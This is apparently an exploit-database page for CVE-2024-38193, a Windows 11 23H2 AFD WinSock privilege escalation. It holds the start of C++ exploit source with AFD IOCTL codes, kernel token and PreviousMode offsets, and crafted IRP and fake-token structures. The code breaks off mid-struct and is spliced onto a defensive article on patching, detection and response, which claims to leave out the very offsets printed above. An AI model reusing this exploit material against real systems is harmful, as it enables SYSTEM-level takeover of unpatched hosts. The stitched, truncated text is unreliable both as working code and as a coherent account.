Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation
Exploit Author: Milad karimi Analysis Author: www.bubbleslearn.ir Category: Local Language: C++ Published Date: 2025-05-09
# Exploit Title: Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation
# Date: 2025-05-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win x64
# CVE : CVE-2024-38193
#pragma once
#include "ntstatus.h"
#include "Windows.h"
#include <iostream>
#pragma comment(lib, "ntdll.lib")
#define HIDWORD(l) ((DWORD)(((DWORDLONG)(l)>>32)&0xFFFFFFFF))
#define LODWORD(l) ((DWORD)((DWORDLONG)(l)))
#define AfdOpenPacket "AfdOpenPacketXX"
#define AFD_DEVICE_NAME L"\\Device\\Afd"
#define LOCALHOST "127.0.0.1"
#define IOCTL_AFD_BIND 0x12003LL
#define IOCTL_AFD_LISTEN 0x1200BLL
#define IOCTL_AFD_CONNECT 0x120BBLL
#define IOCTL_AFD_GET_SOCK_NAME 0x1202FLL
#define FSCTL_PIPE_PEEK 0x11400CLL
#define FSCTL_PIPE_IMPERSONATE 0x11001CLL
#define FSCTL_PIPE_INTERNAL_WRITE 0x119FF8
#define OBJ_CASE_INSENSITIVE 0x00000040
#define OBJ_INHERIT 0x00000002
#define FILE_OPEN_IF 0x3
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#define OFFSET_IN_TOKEN_VARIABLEPART 0x490
#define OFFSET_IN_TOKEN_TOKEN_PRIVILEGES 0x40
#define OFFSET_IN_TOKEN_PRIMARY_GROUP 0xA8
#define OFFSET_IN_TOKEN_DYNAMIC_PART 0xB0
#define OFFSET_IN_TOKEN_DEFAULT_DACL 0xB8
#define PREVIOUS_MODE_OFFSET 0x232
#define OFFSET_TO_ACTIVE_PROCESS_LINKS 0x448
#define OFFSET_TO_TOKEN 0x4b8
#define CURRENT_THREAD (HANDLE)0xFFFFFFFFFFFFFFFE
typedef struct IO_STATUS_BLOCK
{
union
{
DWORD Status;
PVOID Pointer;
};
DWORD* Information;
};
//0x4 bytes (sizeof)
struct _SYSTEM_POWER_STATE_CONTEXT
{
union
{
struct
{
ULONG Reserved1 : 8; //0x0
ULONG TargetSystemState : 4; //0x0
ULONG EffectiveSystemState : 4; //0x0
ULONG CurrentSystemState : 4; //0x0
ULONG IgnoreHibernationPath : 1; //0x0
ULONG PseudoTransition : 1; //0x0
ULONG KernelSoftReboot : 1; //0x0
ULONG DirectedDripsTransition : 1; //0x0
ULONG Reserved2 : 8; //0x0
};
ULONG ContextAsUlong; //0x0
};
};
//0x4 bytes (sizeof)
union _POWER_STATE
{
enum _SYSTEM_POWER_STATE SystemState; //0x0
enum _DEVICE_POWER_STATE DeviceState; //0x0
};
//0x48 bytes (sizeof)
typedef struct _IO_STACK_LOCATION
{
UCHAR MajorFunction; //0x0
UCHAR MinorFunction; //0x1
UCHAR Flags; //0x2
UCHAR Control; //0x3
union
{
struct
{
struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
ULONG Options; //0x10
USHORT FileAttributes; //0x18
USHORT ShareAccess; //0x1a
ULONG EaLength; //0x20
} Create; //0x8
struct
{
struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
ULONG Options; //0x10
USHORT Reserved; //0x18
USHORT ShareAccess; //0x1a
struct _NAMED_PIPE_CREATE_PARAMETERS* Parameters; //0x20
} CreatePipe; //0x8
struct
{
struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
ULONG Options; //0x10
USHORT Reserved; //0x18
USHORT ShareAccess; //0x1a
struct _MAILSLOT_CREATE_PARAMETERS* Parameters; //0x20
} CreateMailslot; //0x8
struct
{
ULONG Length; //0x8
ULONG Key; //0x10
ULONG Flags; //0x14
union _LARGE_INTEGER ByteOffset; //0x18
} Read; //0x8
struct
{
ULONG Length; //0x8
ULONG Key; //0x10
ULONG Flags; //0x14
union _LARGE_INTEGER ByteOffset; //0x18
} Write; //0x8
struct
{
ULONG Length; //0x8
struct _UNICODE_STRING* FileName; //0x10
enum _FILE_INFORMATION_CLASS FileInformationClass; //0x18
ULONG FileIndex; //0x20
} QueryDirectory; //0x8
struct
{
ULONG Length; //0x8
ULONG CompletionFilter; //0x10
} NotifyDirectory; //0x8
struct
{
ULONG Length; //0x8
ULONG CompletionFilter; //0x10
enum _DIRECTORY_NOTIFY_INFORMATION_CLASS
DirectoryNotifyInformationClass; //0x18
} NotifyDirectoryEx; //0x8
struct
{
ULONG Length; //0x8
enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
} QueryFile; //0x8
struct
{
ULONG Length; //0x8
enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
struct _FILE_OBJECT* FileObject; //0x18
union
{
struct
{
UCHAR ReplaceIfExists; //0x20
UCHAR AdvanceOnly; //0x21
};
ULONG ClusterCount; //0x20
VOID* DeleteHandle; //0x20
};
} SetFile; //0x8
struct
{
ULONG Length; //0x8
VOID* EaList; //0x10
ULONG EaListLength; //0x18
ULONG EaIndex; //0x20
} QueryEa; //0x8
struct
{
ULONG Length; //0x8
} SetEa; //0x8
struct
{
ULONG Length; //0x8
enum _FSINFOCLASS FsInformationClass; //0x10
} QueryVolume; //0x8
struct
{
ULONG Length; //0x8
enum _FSINFOCLASS FsInformationClass; //0x10
} SetVolume; //0x8
struct
{
ULONG OutputBufferLength; //0x8
ULONG InputBufferLength; //0x10
ULONG FsControlCode; //0x18
VOID* Type3InputBuffer; //0x20
} FileSystemControl; //0x8
struct
{
union _LARGE_INTEGER* Length; //0x8
ULONG Key; //0x10
union _LARGE_INTEGER ByteOffset; //0x18
} LockControl; //0x8
struct
{
ULONG OutputBufferLength; //0x8
ULONG InputBufferLength; //0x10
ULONG IoControlCode; //0x18
VOID* Type3InputBuffer; //0x20
} DeviceIoControl; //0x8
struct
{
ULONG SecurityInformation; //0x8
ULONG Length; //0x10
} QuerySecurity; //0x8
struct
{
ULONG SecurityInformation; //0x8
VOID* SecurityDescriptor; //0x10
} SetSecurity; //0x8
struct
{
struct _VPB* Vpb; //0x8
struct _DEVICE_OBJECT* DeviceObject; //0x10
} MountVolume; //0x8
struct
{
struct _VPB* Vpb; //0x8
struct _DEVICE_OBJECT* DeviceObject; //0x10
} VerifyVolume; //0x8
struct
{
struct _SCSI_REQUEST_BLOCK* Srb; //0x8
} Scsi; //0x8
struct
{
ULONG Length; //0x8
VOID* StartSid; //0x10
struct _FILE_GET_QUOTA_INFORMATION* SidList; //0x18
ULONG SidListLength; //0x20
} QueryQuota; //0x8
struct
{
ULONG Length; //0x8
} SetQuota; //0x8
struct
{
enum _DEVICE_RELATION_TYPE Type; //0x8
} QueryDeviceRelations; //0x8
struct
{
struct _GUID* InterfaceType; //0x8
USHORT Size; //0x10
USHORT Version; //0x12
struct _INTERFACE* Interface; //0x18
VOID* InterfaceSpecificData; //0x20
} QueryInterface; //0x8
struct
{
struct _DEVICE_CAPABILITIES* Capabilities; //0x8
} DeviceCapabilities; //0x8
struct
{
struct _IO_RESOURCE_REQUIREMENTS_LIST*
IoResourceRequirementList; //0x8
} FilterResourceRequirements; //0x8
struct
{
ULONG WhichSpace; //0x8
VOID* Buffer; //0x10
ULONG Offset; //0x18
ULONG Length; //0x20
} ReadWriteConfig; //0x8
struct
{
UCHAR Lock; //0x8
} SetLock; //0x8
struct
{
enum BUS_QUERY_ID_TYPE IdType; //0x8
} QueryId; //0x8
struct
{
enum DEVICE_TEXT_TYPE DeviceTextType; //0x8
ULONG LocaleId; //0x10
} QueryDeviceText; //0x8
struct
{
UCHAR InPath; //0x8
UCHAR Reserved[3]; //0x9
enum _DEVICE_USAGE_NOTIFICATION_TYPE Type; //0x10
} UsageNotification; //0x8
struct
{
enum _SYSTEM_POWER_STATE PowerState; //0x8
} WaitWake; //0x8
struct
{
struct _POWER_SEQUENCE* PowerSequence; //0x8
} PowerSequence; //0x8
struct
{
union
{
ULONG SystemContext; //0x8
struct _SYSTEM_POWER_STATE_CONTEXT SystemPowerStateContext;
//0x8
};
enum _POWER_STATE_TYPE Type; //0x10
union _POWER_STATE State; //0x18
enum POWER_ACTION ShutdownType; //0x20
} Power; //0x8
struct
{
struct _CM_RESOURCE_LIST* AllocatedResources; //0x8
struct _CM_RESOURCE_LIST* AllocatedResourcesTranslated; //0x10
} StartDevice; //0x8
struct
{
ULONGLONG ProviderId; //0x8
VOID* DataPath; //0x10
ULONG BufferSize; //0x18
VOID* Buffer; //0x20
} WMI; //0x8
struct
{
VOID* Argument1; //0x8
VOID* Argument2; //0x10
VOID* Argument3; //0x18
VOID* Argument4; //0x20
} Others; //0x8
} Parameters; //0x8
struct _DEVICE_OBJECT* DeviceObject; //0x28
struct _FILE_OBJECT* FileObject; //0x30
LONG(*CompletionRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP*
arg2, VOID* arg3); //0x38
VOID* Context; //0x40
}IO_STACK_LOCATION;
//0x18 bytes (sizeof)
struct _KDEVICE_QUEUE_ENTRY
{
struct _LIST_ENTRY DeviceListEntry; //0x0
ULONG SortKey; //0x10
UCHAR Inserted; //0x14
};
//0x58 bytes (sizeof)
struct _KAPC
{
UCHAR Type; //0x0
UCHAR AllFlags; //0x1
UCHAR Size; //0x2
UCHAR SpareByte1; //0x3
ULONG SpareLong0; //0x4
struct _KTHREAD* Thread; //0x8
struct _LIST_ENTRY ApcListEntry; //0x10
VOID* Reserved[3]; //0x20
VOID* NormalContext; //0x38
VOID* SystemArgument1; //0x40
VOID* SystemArgument2; //0x48
CHAR ApcStateIndex; //0x50
CHAR ApcMode; //0x51
UCHAR Inserted; //0x52
};
//0xd0 bytes (sizeof)
struct _IRP
{
SHORT Type; //0x0
USHORT Size; //0x2
USHORT AllocationProcessorNumber; //0x4
USHORT Reserved; //0x6
struct _MDL* MdlAddress; //0x8
ULONG Flags; //0x10
union
{
struct _IRP* MasterIrp; //0x18
LONG IrpCount; //0x18
VOID* SystemBuffer; //0x18
} AssociatedIrp; //0x18
struct _LIST_ENTRY ThreadListEntry; //0x20
struct IO_STATUS_BLOCK IoStatus; //0x30
CHAR RequestorMode; //0x40
UCHAR PendingReturned; //0x41
CHAR StackCount; //0x42
CHAR CurrentLocation; //0x43
UCHAR Cancel; //0x44
UCHAR CancelIrql; //0x45
CHAR ApcEnvironment; //0x46
UCHAR AllocationFlags; //0x47
union
{
struct _IO_STATUS_BLOCK* UserIosb; //0x48
VOID* IoRingContext; //0x48
};
struct _KEVENT* UserEvent; //0x50
union
{
struct
{
union
{
VOID(*UserApcRoutine)(VOID* arg1, struct _IO_STATUS_BLOCK*
arg2, ULONG arg3); //0x58
VOID* IssuingProcess; //0x58
};
union
{
VOID* UserApcContext; //0x60
struct _IORING_OBJECT* IoRing; //0x60
};
} AsynchronousParameters; //0x58
union _LARGE_INTEGER AllocationSize; //0x58
} Overlay; //0x58
VOID(*CancelRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2);
//0x68
VOID* UserBuffer; //0x70
union
{
struct
{
union
{
struct _KDEVICE_QUEUE_ENTRY DeviceQueueEntry; //0x78
VOID* DriverContext[4]; //0x78
};
struct _ETHREAD* Thread; //0x98
CHAR* AuxiliaryBuffer; //0xa0
struct _LIST_ENTRY ListEntry; //0xa8
union
{
struct _IO_STACK_LOCATION* CurrentStackLocation; //0xb8
ULONG PacketType; //0xb8
};
struct _FILE_OBJECT* OriginalFileObject; //0xc0
VOID* IrpExtension; //0xc8
} Overlay; //0x78
struct _KAPC Apc; //0x78
VOID* CompletionKey; //0x78
} Tail; //0x78
};
typedef struct _TA_ADDRESS
{
USHORT AddressLength;
USHORT AddressType;
UCHAR Address[1];
}TA_ADDRESS;
typedef struct _TRANSPORT_ADDRESS
{
LONG TAAddressCount;
TA_ADDRESS Address[1];
}TRANSPORT_ADDRESS;
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
}OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
typedef struct _SYSTEM_MODULE_ENTRY
{
HANDLE Section;
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR FullPathName[256];
} SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION
{
ULONG Count;
SYSTEM_MODULE_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX
{
PVOID Object;
ULONG_PTR UniqueProcessId;
ULONG_PTR HandleValue;
ULONG GrantedAccess;
USHORT CreatorBackTraceIndex;
USHORT ObjectTypeIndex;
ULONG HandleAttributes;
ULONG Reserved;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
typedef struct _SYSTEM_HANDLE_INFORMATION_EX
{
ULONG_PTR NumberOfHandles;
ULONG_PTR Reserved;
SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;
typedef struct _AFD_CREATE_PACKET {
//FILE_FULL_EA_INFORMATION
ULONG NextEntryOffset;
WORD Flags;
UCHAR EaNameLength;
USHORT EaValueLength;
CHAR EaName[15];
//AFD_CREATE_PACKET
ULONG EndpointFlags;
ULONG GroupID;
ULONG AddressFamily;
ULONG SocketType;
ULONG Protocol;
ULONG SizeOfTransportName;
wchar_t TransportName[16];
//UCHAR Unkown;
} AFD_CREATE_PACKET;
enum THREADINFOCLASS { ThreadImpersonationToken = 5 };
enum SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemExtendedHandleInformation = 64
};
typedef enum EVENT_TYPE {
NotificationEvent,
SynchronizationEvent
};
typedef struct _AFD_BIND_DATA {
ULONG ShareType;
SOCKADDR_IN addr;
} AFD_BIND_DATA, * PAFD_BIND_DATA;
typedef struct alignas(16) MY_AFD_CONNECT_INFO
{
__int64 UseSan;
__int64 hNtSock1;
__int64 Unknown;
__int32 tmp6;
WORD const_16;
sockaddr_in bind;
};
typedef struct FAKE_DATA_ENTRY_QUEUE
{
DWORD tmp;
LIST_ENTRY nextQueue;
__int64 unknown;
PVOID security_client_context;
__int64 unknown2;
__int64 sizeOfData;
char DATA[0x77FD0];
};
typedef struct _AFD_LISTEN_INFO {
ULONG unknown;
__int64 MaximumConnectionQueue;
} AFD_LISTEN_INFO, * PAFD_LISTEN_INFO;
typedef struct _SECURITY_CLIENT_CONTEXT
{
_SECURITY_QUALITY_OF_SERVICE SecurityQos;
void* ClientToken;
unsigned __int8 DirectlyAccessClientToken;
unsigned __int8 DirectAccessEffectiveOnly;
unsigned __int8 ServerIsRemote;
_TOKEN_CONTROL ClientTokenControl;
}SECURITY_CLIENT_CONTEXT, * PSECURITY_CLIENT_CONTEXT;
struct __declspec(align(8)) _OWNER_ENTRY
{
unsigned __int64 OwnerThread;
DWORD ___u1;
};
//0x68 bytes (sizeof)
typedef struct _ERESOURCE
{
struct _LIST_ENTRY SystemResourcesList; //0x0
struct _OWNER_ENTRY* OwnerTable; //0x10
SHORT ActiveCount; //0x18
union
{
USHORT Flag; //0x1a
struct
{
UCHAR ReservedLowFlags; //0x1a
UCHAR WaiterPriority; //0x1b
};
};
VOID* SharedWaiters; //0x20
VOID* ExclusiveWaiters; //0x28
struct _OWNER_ENTRY OwnerEntry; //0x30
ULONG ActiveEntries; //0x40
ULONG ContentionCount; //0x44
ULONG NumberOfSharedWaiters; //0x48
ULONG NumberOfExclusiveWaiters; //0x4c
VOID* Reserved2; //0x50
union
{
VOID* Address; //0x58
ULONGLONG CreatorBackTraceIndex; //0x58
};
ULONGLONG SpinLock; //0x60
}ERESOURCE, *PERESOURCE;
//0x8 bytes (sizeof)
typedef struct _EX_PUSH_LOCK
{
union
{
struct
{
ULONGLONG Locked : 1; //0x0
ULONGLONG Waiting : 1; //0x0
ULONGLONG Waking : 1; //0x0
ULONGLONG MultipleShared : 1; //0x0
ULONGLONG Shared : 60; //0x0
};
ULONGLONG Value; //0x0
VOID* Ptr; //0x0
};
};
//0x10 bytes (sizeof)
typedef struct _SEP_CACHED_HANDLES_TABLE
{
struct _EX_PUSH_LOCK Lock; //0x0
struct _RTL_DYNAMIC_HASH_TABLE* HashTable; //0x8
};
//0x8 bytes (sizeof)
typedef struct _EX_RUNDOWN_REF
{
union
{
ULONGLONG Count; //0x0
VOID* Ptr; //0x0
};
};
//0x20 bytes (sizeof)
typedef struct _OB_HANDLE_REVOCATION_BLOCK
{
struct _LIST_ENTRY RevocationInfos; //0x0
struct _EX_PUSH_LOCK Lock; //0x10
struct _EX_RUNDOWN_REF Rundown; //0x18
};
//0xc0 bytes (sizeof)
typedef struct _SEP_LOGON_SESSION_REFERENCES
{
struct _SEP_LOGON_SESSION_REFERENCES* Next; //0x0
struct _LUID LogonId; //0x8
struct _LUID BuddyLogonId; //0x10
LONGLONG ReferenceCount; //0x18
ULONG Flags; //0x20
struct _DEVICE_MAP* pDeviceMap; //0x28
VOID* Token; //0x30
struct _UNICODE_STRING AccountName; //0x38
struct _UNICODE_STRING AuthorityName; //0x48
struct _SEP_CACHED_HANDLES_TABLE CachedHandlesTable; //0x58
struct _EX_PUSH_LOCK SharedDataLock; //0x68
struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* SharedClaimAttributes;
//0x70
struct _SEP_SID_VALUES_BLOCK* SharedSidValues; //0x78
struct _OB_HANDLE_REVOCATION_BLOCK RevocationBlock; //0x80
struct _EJOB* ServerSilo; //0xa0
struct _LUID SiblingAuthId; //0xa8
struct _LIST_ENTRY TokenList; //0xb0
};
//0x30 bytes (sizeof)
typedef struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION
{
ULONG SecurityAttributeCount; //0x0
struct _LIST_ENTRY SecurityAttributesList; //0x8
ULONG WorkingSecurityAttributeCount; //0x18
struct _LIST_ENTRY WorkingSecurityAttributesList; //0x20
}AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION;
//0x20 bytes (sizeof)
typedef struct _SEP_SID_VALUES_BLOCK
{
ULONG BlockLength; //0x0
LONGLONG ReferenceCount; //0x8
ULONG SidCount; //0x10
ULONGLONG SidValuesStart; //0x18
}SEP_SID_VALUES_BLOCK,*PSEP_SID_VALUES_BLOCK;
//0x18 bytes (sizeof)
struct _SEP_TOKEN_PRIVILEGES
{
ULONGLONG Present; //0x0
ULONGLONG Enabled; //0x8
ULONGLONG EnabledByDefault; //0x10
};
//0x1f bytes (sizeof)
struct _SEP_AUDIT_POLICY
{
struct _TOKEN_AUDIT_POLICY AdtTokenPolicy; //0x0
UCHAR PolicySetStatus; //0x1e
};
//0x498 bytes (sizeof)
struct _TOKEN
{
struct _TOKEN_SOURCE TokenSource; //0x0
struct _LUID TokenId; //0x10
struct _LUID AuthenticationId; //0x18
struct _LUID ParentTokenId; //0x20
union _LARGE_INTEGER ExpirationTime; //0x28
struct _ERESOURCE* TokenLock; //0x30
struct _LUID ModifiedId; //0x38
struct _SEP_TOKEN_PRIVILEGES Privileges; //0x40
struct _SEP_AUDIT_POLICY AuditPolicy; //0x58
ULONG SessionId; //0x78
ULONG UserAndGroupCount; //0x7c
ULONG RestrictedSidCount; //0x80
ULONG VariableLength; //0x84
ULONG DynamicCharged; //0x88
ULONG DynamicAvailable; //0x8c
ULONG DefaultOwnerIndex; //0x90
struct _SID_AND_ATTRIBUTES* UserAndGroups; //0x98
struct _SID_AND_ATTRIBUTES* RestrictedSids; //0xa0
VOID* PrimaryGroup; //0xa8
ULONG* DynamicPart; //0xb0
struct _ACL* DefaultDacl; //0xb8
enum _TOKEN_TYPE TokenType; //0xc0
enum _SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; //0xc4
ULONG TokenFlags; //0xc8
UCHAR TokenInUse; //0xcc
ULONG IntegrityLevelIndex; //0xd0
ULONG MandatoryPolicy; //0xd4
void* LogonSession; //0xd8
struct _LUID OriginatingLogonSession; //0xe0
struct _SID_AND_ATTRIBUTES_HASH SidHash; //0xe8
struct _SID_AND_ATTRIBUTES_HASH RestrictedSidHash; //0x1f8
struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION*
pSecurityAttributes; //0x308
VOID* Package; //0x310
struct _SID_AND_ATTRIBUTES* Capabilities; //0x318
ULONG CapabilityCount; //0x320
struct _SID_AND_ATTRIBUTES_HASH CapabilitiesHash; //0x328
struct _SEP_LOWBOX_NUMBER_ENTRY* LowboxNumberEntry; //0x438
struct _SEP_CACHED_HANDLES_ENTRY* LowboxHandlesEntry; //0x440
struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* pClaimAttributes;
//0x448
VOID* TrustLevelSid; //0x450
struct _TOKEN* TrustLinkedToken; //0x458
VOID* IntegrityLevelSidValue; //0x460
struct _SEP_SID_VALUES_BLOCK* TokenSidValues; //0x468
struct _SEP_LUID_TO_INDEX_MAP_ENTRY* IndexEntry; //0x470
struct _SEP_TOKEN_DIAG_TRACK_ENTRY* DiagnosticInfo; //0x478
struct _SEP_CACHED_HANDLES_ENTRY* BnoIsolationHandlesEntry; //0x480
VOID* SessionObject; //0x488
ULONGLONG VariablePart; //0x490
};
//0x38 bytes (sizeof)
struct _OBJECT_HEADER
{
LONGLONG PointerCount; //0x0
union
{
LONGLONG HandleCount; //0x8
VOID* NextToFree; //0x8
};
struct _EX_PUSH_LOCK Lock; //0x10
UCHAR TypeIndex; //0x18
union
{
UCHAR TraceFlags; //0x19
struct
{
UCHAR DbgRefTrace : 1; //0x19
UCHAR DbgTracePermanent : 1; //0x19
};
};
UCHAR InfoMask; //0x1a
union
{
UCHAR Flags; //0x1b
struct
{
UCHAR NewObject : 1; //0x1b
UCHAR KernelObject : 1; //0x1b
UCHAR KernelOnlyAccess : 1; //0x1b
UCHAR ExclusiveObject : 1; //0x1b
UCHAR PermanentObject : 1; //0x1b
UCHAR DefaultSecurityQuota : 1; //0x1b
UCHAR SingleHandleEntry : 1; //0x1b
UCHAR DeletedInline : 1; //0x1b
};
};
ULONG Reserved; //0x1c
union
{
struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo; //0x20
VOID* QuotaBlockCharged; //0x20
};
VOID* SecurityDescriptor; //0x28
struct _TOKEN Body; //0x30
};
struct mm {
void* fake_data_entry;
void* input;
_IRP* crafted_irp;
IO_STACK_LOCATION *crafted_arbitrary_io_stack_location;
void* p_mem_0x30;
void* p_mem_0xD0_2;
_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes;
ACL* VariablePartDefaultDacl;
ACL* VariablePartDefaultDacl2;
_ERESOURCE* TokenLock;
void* PrimaryGroup;
int sizeOfClientTokenAndObjectHeader;
PSEP_SID_VALUES_BLOCK TokenSidValues;
_SECURITY_CLIENT_CONTEXT* security_client_context;
_SEP_LOGON_SESSION_REFERENCES* LogonSession;
_TOKEN* fakeToken;
void *pipe_100_im_control_block;
void* pipe_100_rw_control_block;
void* p_mem_Pipe_hToPipe_1000_rw;
void* p_mem_Pipe_hToPipe_1000_rw_2;
HANDLE hPipeIM;
HANDLE hPipeRW;
HANDLE hFileIM;
HANDLE hFileRW;
HANDLE IncPrimitiveTOKEN;
HANDLE RWPrimitiveTOKEN;
};
//0x18 bytes (sizeof)
struct _DISPATCHER_HEADER
{
union
{
volatile LONG Lock; //0x0
LONG LockNV; //0x0
struct
{
UCHAR Type; //0x0
UCHAR Signalling; //0x1
UCHAR Size; //0x2
UCHAR Reserved1; //0x3
};
struct
{
UCHAR TimerType; //0x0
union
{
UCHAR TimerControlFlags; //0x1
struct
{
UCHAR Absolute : 1;Microsoft Windows 11 Pro 23H2 — Ancillary Function Driver for WinSock Privilege Escalation (CVE-2024-38193)
This article provides a high-level, defensive analysis of the Ancillary Function Driver (AFD) WinSock privilege-escalation vulnerability tracked as CVE-2024-38193. It explains what the vulnerability means, why it matters, how to prioritize and mitigate risk, and how security teams can detect and respond — without providing exploit details or step-by-step attack instructions.
Executive summary
CVE-2024-38193 is a local privilege escalation (LPE) vulnerability affecting the Windows Ancillary Function Driver (AFD) component used by WinSock. An attacker with an already-running local account could leverage the vulnerability to gain elevated privileges on vulnerable Windows 11 23H2 systems. Because LPEs are frequently used as post-compromise escalation vectors, organizations should treat this as high priority for patching and monitoring.
What is the AFD / WinSock component?
- The Ancillary Function Driver (AFD) is a kernel-level component used by the Windows networking stack (WinSock) to manage sockets and other networking operations.
- AFD runs in kernel context and therefore has high privileges. Vulnerabilities in kernel drivers can allow privilege escalation or kernel memory corruption when abused by a local user or process.
- CVE-2024-38193 relates specifically to how AFD handles certain local requests; a successful exploit allows privilege escalation from a lower-privileged local account to SYSTEM or comparable elevated context.
Why this vulnerability matters
- Local privilege escalations are commonly chained with initial access techniques (phishing, remote code execution, or credential theft) to gain full control of an endpoint.
- Because AFD is a core kernel component, exploitation can lead to full system compromise, persistence, and the ability to tamper with other security controls.
- Exploitation is local-only (requires code running locally), so protecting endpoints and restricting lateral movement reduces exposure.
Affected systems and scope
Publicly available information associates this issue with Windows 11 Pro 23H2 in observed testing. Comprehensive, vendor-supplied affected product lists and mitigations are the authoritative source; security teams should consult the Microsoft Security Update Guide or their vendor advisory for exact build and OS edition coverage.
High-level technical summary (non-actionable)
- The vulnerability arises in AFD’s handling of certain local I/O requests. Improper validation or handling at the kernel-driver boundary can let a low-privileged user manipulate execution context or credentials.
- Successful exploitation leads to privilege escalation by allowing an attacker-controlled context to obtain or impersonate a higher-privilege token or to execute code in a higher-privileged process.
- This description intentionally omits low-level memory offsets, IOCTL values, or exploitation steps to avoid enabling misuse.
Risk assessment and prioritization
- Exploitability: Medium to high for local attackers who can run code on an endpoint.
- Impact: High — potential for SYSTEM-level access, persistence, and evasion of controls.
- Likelihood: Depends on exposure controls. Endpoints with unprivileged local accounts, developer tools, or users with permission to run unsigned code are at higher risk.
- Action priority: Apply vendor patches ASAP; implement compensating controls where immediate patching is not possible.
Mitigation and remediation
Follow a defense-in-depth approach and prioritize official patches and vendor guidance:
- Apply vendor updates: Install Microsoft security updates addressing CVE-2024-38193 as soon as they are available and validated in your environment.
- Patch management: Use automated patch orchestration and test staging to accelerate rollout to production endpoints.
- Least privilege: Enforce principle of least privilege for local accounts; avoid granting administrative privileges where not required.
- Application control: Block or restrict arbitrary local code execution using AppLocker, Windows Defender Application Control (WDAC), or similar policies.
- Credential protections: Enable LSA protection, Credential Guard, and restrict access to sensitive service accounts on endpoints.
- EDR and kernel integrity: Ensure endpoint detection & response (EDR) solutions with kernel instrumentation are deployed and configured to alert on anomalous kernel interactions and suspicious local exploitation attempts.
Detection strategies (defensive guidance)
Detection should focus on early indicators and post-exploitation artifacts rather than driver-level exploitation details. Suggested defensive measures include:
- Monitor for unexpected privilege escalations and processes starting with elevated tokens that are not explainable by normal workflows.
- Look for anomalous process behavior on endpoints where users do not typically run development or networking tools (for example, unsigned local utilities spawning from user context into SYSTEM context).
- Correlate EDR alerts for kernel anomalies with local process creation and authentication events.
- Enable and collect relevant Windows auditing logs (Process Creation, Token Elevation, Kernel Audit events if supported by your tooling) into your SIEM for correlation and triage.
- Track patch compliance and generate alerts for systems missing the vendor fix.
Example detection indicators (non-actionable)
Below are high-level examples of what to monitor; these are intended as defensive detection ideas, not exploit recipes:
- Unexpected creation of high-privilege processes (e.g., cmd.exe, powershell.exe) from non-administrator users.
- EDR or kernel monitoring alerts indicating abnormal interactions with networking drivers, kernel objects, or impersonation attempts.
- Event log sequences showing a low-privilege process followed by rapid token elevation or unusual parent/child process relationships.
- Inventory deviations showing the presence of atypical local binaries or tools on endpoints where they shouldn’t be.
Incident response and forensics guidance
- If you suspect exploitation, isolate the affected system(s) from the network to prevent lateral movement and data exfiltration.
- Capture volatile forensic artifacts: memory image, running process list, loaded kernel drivers, and relevant event logs. Work with forensic specialists to preserve chain-of-custody for investigations.
- Collect EDR telemetry for the time window of suspected activity and search for indicators of escalation or kernel manipulation.
- Rebuild or reimage compromised systems after confirming scope and ensuring the root cause (vulnerable driver/version) has been mitigated.
- Rotate credentials and service account secrets that may have been exposed or elevated during the compromise.
Hardening checklist
| Control | Recommended action |
|---|---|
| Patching | Apply Microsoft security updates for CVE-2024-38193 across all Windows 11 23H2 systems immediately. |
| Least privilege | Remove unnecessary local admin rights; use privileged access workstations and just-in-time administrative models. |
| Application control | Enforce AppLocker/WDAC to prevent execution of unauthorized local binaries. |
| EDR/Logging | Ensure advanced endpoint telemetry is enabled and logs are centrally collected and retained for investigation. |
| Credential protection | Enable Credential Guard and LSA protection where supported, and restrict access to secrets and tokens. |
| Network segmentation | Limit lateral movement by segmenting endpoints and restricting unnecessary services and remote access. |
Communications and policy actions
- Inform system owners and IT operations of the vulnerability, expected impact, and patch timeline.
- Prioritize endpoints that handle sensitive data, have privileged users, or are internet-facing for the initial patch wave.
- Update incident response playbooks to include local privilege escalation scenarios and ensure tools for memory capture and kernel artifact analysis are available to responders.
Where to get authoritative information
- Microsoft Security Update Guide and official Microsoft advisories for CVE-2024-38193.
- Common Vulnerabilities and Exposures (CVE) database entry for CVE-2024-38193 for reference details.
